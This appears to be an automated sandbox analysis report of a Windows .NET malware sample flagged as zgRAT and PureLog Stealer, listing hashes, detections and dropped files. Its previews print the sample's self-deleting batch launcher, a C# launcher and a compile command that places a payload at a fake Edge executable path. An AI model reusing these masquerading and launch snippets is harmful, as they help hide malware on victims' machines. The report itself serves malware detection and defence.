                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\U9jP4iZUUm.bat"
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):25
                                                    Entropy (8bit):4.293660689688185
                                                    Encrypted:false
                                                    SSDEEP:3:Su/zrgETRn:Subpn
                                                    MD5:8B15968ED7C88CA6FD67E0385FE1FEBA
                                                    SHA1:A7390414998E94F95C07596A3A0BC81D4BF2E170
                                                    SHA-256:82241D7451281F4A852497EB721313EACB07EAE57B5273CDF695DED306F86C88
                                                    SHA-512:05FCFE535F5630BB57EE9C3C34619D4EE04F39D40C328117CB11DAF533AF5EC7B931294137A8C9BB4FF1FE64817212719857DBEE4EBBA8A41269E0F5FD195EDA
                                                    Malicious:false
                                                    Preview:g4KZoopNE6minPy0ukmPmBeMf
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                    Category:dropped
                                                    Size (bytes):409
                                                    Entropy (8bit):4.996566118785529
                                                    Encrypted:false
                                                    SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LCcIiFkD:JNVQIbSfhWLzIiFkMSfhWLCclFkD
                                                    MD5:EC9254F4F65F4E1CFAB857FBB5FF59A9
                                                    SHA1:DADB9713603567AF618ED59E47C1E733CBD14ED7
                                                    SHA-256:953343BC31B7A44D934182A809521203992A6FE8C386A873AB611F07EAB09C2B
                                                    SHA-512:2E162DBEF41337EB1AC937EB5F78268A53586FD067FD0A1578FFE751D08A3C6D7036485A6B528F3D97710F6FC15BA7FAC1B2921660A4B8A3B8D3F4E41FD343DC
                                                    Malicious:false
                                                    Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\google\GrVEPTmsoNTbY.exe"); } catch { } }).Start();. }.}.
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):266
                                                    Entropy (8bit):5.1321287867189405
                                                    Encrypted:false
                                                    SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8o923fYV1ICsH:Hu7L//TRRzscQyw43
                                                    MD5:505C2BAFC07F4D0F88F945BD9B28599E
                                                    SHA1:CD85F62FAC0FB8B68E833B995535FD112B3794CA
                                                    SHA-256:EB46CB4C5BD971384B1A558786CA622BB5A39FB115CC8A8D36E25579F560A12C
                                                    SHA-512:06382C607EDEAB50E9353EF1899379EE3496E5EE2B0F8A4A223DCDDAB2EF6747BDA0D60F004E8E6658D9512CF6F30D29DC15E7145DCE905402749622157656BE
                                                    Malicious:true
                                                    Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.0.cs"
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (346), with CRLF, CR line terminators
                                                    Category:modified
                                                    Size (bytes):767
                                                    Entropy (8bit):5.250791831718861
                                                    Encrypted:false
                                                    SSDEEP:12:KMi/I/u7L//TRRzscQyw4+KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoI/un/VRzstyMKax5DqBVKVrdFAMBt
                                                    MD5:E2642FD4CFD1AF12C259341551AC57DD
                                                    SHA1:AC80860257ED506352389AC1209F7F6A8A983615
                                                    SHA-256:2EDDBC7E4AA8FA7CBF83F0035A62B7C3AF47A7255617CE4C299044D8C8751F20
                                                    SHA-512:C2DFD06E82EE301333F9C6068ED9B51195F9425A4E68F0E48B26EB3EAD670F92A06BC09EE24AA2008D6FCEACB2648A4CA260E64F66B28AA268BC6E9F4B6CDD0E
                                                    Malicious:false
                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Joe Sandbox View:
                                                    • Filename: ugRGgCJhQl.exe, Detection: malicious
                                                    • Filename: eCGKhYZtgx.exe, Detection: malicious
                                                    • Filename: czcgyt.exe, Detection: malicious
                                                    • Filename: trkfmve.exe, Detection: malicious
                                                    • Filename: iolZQ9869U.exe, Detection: malicious
                                                    • Filename: 2f3cc3bc5e36d27c9b2020e20fc2a031efba9ec81995a.exe, Detection: malicious
                                                    • Filename: jZrY9owO7A.exe, Detection: malicious
                                                    • Filename: Componentsession.exe, Detection: malicious
                                                    • Filename: -#U00bc).exe, Detection: malicious
                                                    • Filename: Loader.exe, Detection: malicious
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):85504
                                                    Entropy (8bit):5.8769270258874755
                                                    Encrypted:false
                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):23552
                                                    Entropy (8bit):5.519109060441589
                                                    Encrypted:false
                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):85504
                                                    Entropy (8bit):5.8769270258874755
                                                    Encrypted:false
                                                    SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                    MD5:E9CE850DB4350471A62CC24ACB83E859
                                                    SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                    SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                    SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 71%
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):23552
                                                    Entropy (8bit):5.519109060441589
                                                    Encrypted:false
                                                    SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                    MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                    SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                    SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                    SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):62
                                                    Entropy (8bit):5.183640866664016
                                                    Encrypted:false
                                                    SSDEEP:3:jFlPXWa2/Q8RjSMi:jzOBDi
                                                    MD5:1456F967E6B322FA81C31F73CBB61229
                                                    SHA1:7C4A30F62C8352177231B1216B74E7AE3728C46D
                                                    SHA-256:5D0DA1B898487CF23DD7783BDDE813CA5F3B9DA92FB95268061792C7229D9C6F
                                                    SHA-512:A5531161775FDC3AF25729F40CF2BE61B9A9997AAEEEDB8EC81B89943EE0F1F43A81CBCFBD50EAEEDE421746E190758F2D670F8C106A3B3340AA8A4F55598C45
                                                    Malicious:false
                                                    Preview:NsDwiRgJ8Z6iCQ9jXHbLd8749956JBXntf3HNGHapxv4IE5OV7AQkEkPvJwiVk
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):33792
                                                    Entropy (8bit):5.541771649974822
                                                    Encrypted:false
                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):32256
                                                    Entropy (8bit):5.631194486392901
                                                    Encrypted:false
                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                    Process:C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):33792
                                                    Entropy (8bit):5.541771649974822
                                                    Encrypted:false
                                                    SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                    MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                    SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                    SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                    SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 29%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):69632
                                                    Entropy (8bit):5.932541123129161
                                                    Encrypted:false
                                                    SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                    MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                    SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                    SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                    SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 17%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):32256
                                                    Entropy (8bit):5.631194486392901
                                                    Encrypted:false
                                                    SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                    MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                    SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                    SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                    SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 25%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1959424
                                                    Entropy (8bit):7.551297019501714
                                                    Encrypted:false
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    MD5:1B7D99034E439D9F034C9969F88F7B74
                                                    SHA1:8E40BDCDF5092E0AFEA38110D5F7D4DB60C45548
                                                    SHA-256:916768DC2A2389D20B0216B9FA62C953860EAAEE368F529B820AC009F11018B1
                                                    SHA-512:D73461D3311CCED4D99042A0130BC603E75AB97F8DF413AEB62B4E003691272D15A0293B6C356E72787232FAEBBBCB1C1A6487D68FF6DA48F65228F1938059FA
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\RuntimeBroker.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\RuntimeBroker.exe, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 66%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oef................................. ........@.. .......................@............@.................................@...K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B................p.......H.......D...l............................................................0..........(.... ........8........E........=...........8....(.... ........8....*(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....).......9...........b.......8$...8.... ....~....{h...:....& ....8.......... ....8....~....9.... ....~....{....9....& ....8}.......~....(f...~....(j... ....<.... ....~....{....9G...& ....8<...r...ps....z*~....(^... ...
                                                    Process:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:MSVC .res
                                                    Category:dropped
                                                    Size (bytes):1224
                                                    Entropy (8bit):4.435108676655666
                                                    Encrypted:false
                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                    Malicious:false
                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):4608
                                                    Entropy (8bit):3.9498828394823713
                                                    Encrypted:false
                                                    SSDEEP:48:6tJvPtPuM7Jt8Bs3FJsdcV4MKe273df6vqBHiOulajfqXSfbNtm:4PFPc+Vx9MIvkMcjRzNt
                                                    MD5:3D3B629782063180677366E59F36AF73
                                                    SHA1:6D23219C11BA123BE3E9CCF0BAB95CCF3A54D51D
                                                    SHA-256:C8FF27B511D51EC36F298066336C9D13E161544A43FF9A178EFFAA00E6CEE4BB
                                                    SHA-512:58F97A47964D43F4EA6DFEACFB3BA4FAFC45B8F7F8BFF418C8318512656384E0C5679EEBB5631AF2B8801567FC072ECD4004B6F8500C780839BA671111961E71
                                                    Malicious:true
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................X'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..0.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                    Process:C:\Windows\System32\w32tm.exe
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):151
                                                    Entropy (8bit):4.8566374747781
                                                    Encrypted:false
                                                    SSDEEP:3:VLV993J+miJWEoJ8FXiz3c9HXKvodUvj:Vx993DEU4X1A
                                                    MD5:896558DB3E3C35EF4B4F000840E8D787
                                                    SHA1:2798BFCD8087F4685024F74FC6C1B1DB6EBFEA6C
                                                    SHA-256:D8ECE3F1618D42766FDEDE9BDCB5D7777CAC5295B7624430760D6A9EF9F2CDF8
                                                    SHA-512:D016530A2F3E51333675ACA6DB7DF9D1E84E76A22EE82E72CFF92391B99F7E228226C20DC8E0DFC5734A7A4602FF2175BBACE2001A024BB979F7C1C21309961B
                                                    Malicious:false
                                                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 29/08/2024 18:39:27..18:39:27, error: 0x80072746.18:39:32, error: 0x80072746.
                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.551297019501714
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:4ra1Fo2Zql.exe
                                                    File size:1'959'424 bytes
                                                    MD5:1b7d99034e439d9f034c9969f88f7b74
                                                    SHA1:8e40bdcdf5092e0afea38110d5f7d4db60c45548
                                                    SHA256:916768dc2a2389d20b0216b9fa62c953860eaaee368f529b820ac009f11018b1
                                                    SHA512:d73461d3311cced4d99042a0130bc603e75ab97f8df413aeb62b4e003691272d15a0293b6c356e72787232faebbbcb1c1a6487d68ff6da48f65228f1938059fa
                                                    SSDEEP:24576:R5lX/OM3jOARx0qN+gBltRl3U3v5PjDYPgCEyKvJs9lHuqkZpEJbTzEC3HtBntip:RTHbfh2jtCEyKBs/HzkeEgntiO
                                                    TLSH:E095AE1A99919E3BC2B457314467043E5394D3363EAAEB1B390F20E668437B5CA731FB
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Oef................................. ........@.. .......................@............@................................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x5dfc8e
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66654F11 [Sun Jun 9 06:43:29 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    Name | Virtual Address | Virtual Size | Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1dfc40 | 0x4b | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1e0000 | 0x320 | .rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1e2000 | 0xc | .reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
